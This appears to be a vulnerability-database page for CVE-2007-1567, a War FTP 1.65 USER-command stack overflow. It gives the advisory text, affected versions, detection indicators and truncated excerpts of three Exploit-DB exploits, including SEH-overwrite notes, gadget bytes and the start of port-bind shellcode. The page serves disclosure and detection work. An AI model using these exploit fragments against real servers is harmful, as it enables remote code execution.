CVE-2007-1567
published 2007-03-21CVE-2007-1567: Stack-based buffer overflow in War FTP Daemon 1.65, and possibly earlier, allows remote attackers to cause a denial of service or execute arbitrary code via…
PriorityP355critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
50.55%
98.8th percentile
Stack-based buffer overflow in War FTP Daemon 1.65, and possibly earlier, allows remote attackers to cause a denial of service or execute arbitrary code via unspecified vectors, as demonstrated by warftp_165.tar by Immunity. NOTE: this might be the same issue as CVE-1999-0256, CVE-2000-0131, or CVE-2006-2171, but due to Immunity's lack of details, this cannot be certain.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| war_ftp_daemon | war_ftp_daemon | <= 1.65 | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\xeb\x06\x90\x90
bytes↗
\xa9\x11\x02\x75
- →Exploit uses SEH overwrite technique with pop/pop/ret gadget from ws2help.dll on Windows 2000 SP4; detect anomalous SEH chain overwrites in WarFTP process. ↗
- →USER command shellcode must avoid bytes 0x40 (@), 0x0A (\n), 0x0D (\r), 0x00 (\0); alphanumeric/encoded shellcode in FTP USER field is a strong exploit indicator. ↗
- →EIP overwrite exploit (exploit-db/3474) uses 'call ebp' gadget from user32.dll on Windows 2000 SP4; monitor for EIP control via this gadget in WarFTP crash analysis. ↗
- ·JMP ESP return addresses are OS/SP-specific; the exploit includes hardcoded addresses for Windows XP SP0–SP2 and Windows 2000 SP0–SP3 (English and Spanish). Detection based on return addresses must account for all variants. ↗
- ·The NVD notes this may be the same issue as CVE-1999-0256, CVE-2000-0131, or CVE-2006-2171; deduplication against those CVEs is required before creating separate detection rules. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
WarFTP 1.65 - 'USER' Remote Buffer Overflow
exploitdb·2007-03-25
CVE-2007-1567 WarFTP 1.65 - 'USER' Remote Buffer Overflow
WarFTP 1.65 - 'USER' Remote Buffer Overflow
---
#include
#include
#include
#define VULNSERVER "WAR-FTPD 1.65"
#define VULNCMD "\x55\x53\x45\x52\x20"
#define ZERO '\x00'
#define NOP '\x90'
#define VULNBUFF 485
#define BUFFREAD 128
#define PORT 21
#define LENJMPESP 4
/* #############################################################################
##### #####
##### WARFTP - VERSION 1.65 #####
##### #####
##### WarFTP Username Stack-Based Buffer-Overflow Vulnerability #####
##### #####
##### DESCRIPTION: WarFTP is prone to a stack-based buffer-overflow #####
##### vulnerability because it fails to properly check boundaries #####
##### on user-supplied data before copying it to an insufficiently #####
##### sized buffer. #####
##### #####
##### FUNC VULNERABLE: sprintf(char *buffer, const c
Exploit-DB
WarFTP 1.65 (Windows 2000 SP4) - 'USER' Remote Buffer Overflow
exploitdb·2007-03-15
CVE-2007-1567 WarFTP 1.65 (Windows 2000 SP4) - 'USER' Remote Buffer Overflow
WarFTP 1.65 (Windows 2000 SP4) - 'USER' Remote Buffer Overflow
---
# ===============================================================================================
# WarFTP 1.65 (USER) Remote Buffer Overflow SEH overflow Exploit
# By Umesh Wanve
# ===============================================================================================
#
# Date : 15-03-2007
#
# Tested on Windows 2000 SP4 Server English
# Windows 2000 SP4 Professional English
#
# You can replace shellcode with your favourite one :)
#
#
# Well I used different technique here. Rather than overwriting EIP, I used SEH handler overwrite
# method. Preety simple.
#
# Stack ---> buffer === AAAAA.........
# |
# Pointer to next SEH === Short Jump to Hellcode
# |
# SEH Handler === Pop, Pop, Ret (ws2help.dll win2000 sp4)
# |
#
Exploit-DB
WarFTP 1.65 (Windows 2000 SP4) - 'USER' Remote Buffer Overflow
exploitdb·2007-03-14
CVE-2007-1567 WarFTP 1.65 (Windows 2000 SP4) - 'USER' Remote Buffer Overflow
WarFTP 1.65 (Windows 2000 SP4) - 'USER' Remote Buffer Overflow
---
#!/usr/bin/python
# Remote exploit for WarFTP 1.65. Tested on Windows 2000 server SP4 inside
# VMware. A trivially exploitable stack overflow is present in WarFTP which
# can be triggered by sending a long username (>480 bytes) along with the USER
# ftp command. Maybe other commands like PASS might also be affected. I did
# not check though. This exploit binds shell on TCP port 4444 and then
# connects to it
#
# Author shall not bear any responsibility for any screw ups
# Winny Thomas :-)
import os
import sys
import time
import socket
import struct
# alphanumeric portbind shellcode from metasploit
shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
shellcode += "\x49\x51\x5a\x56\x54\x58\x36\x3
No writeups or analysis indexed.
http://secunia.com/advisories/24494http://www.securityfocus.com/bid/22944http://www.vupen.com/english/advisories/2007/0933https://www.immunityinc.com/downloads/immpartners/warftp_165.tarhttp://secunia.com/advisories/24494http://www.securityfocus.com/bid/22944http://www.vupen.com/english/advisories/2007/0933https://www.immunityinc.com/downloads/immpartners/warftp_165.tar
2007-03-21
Published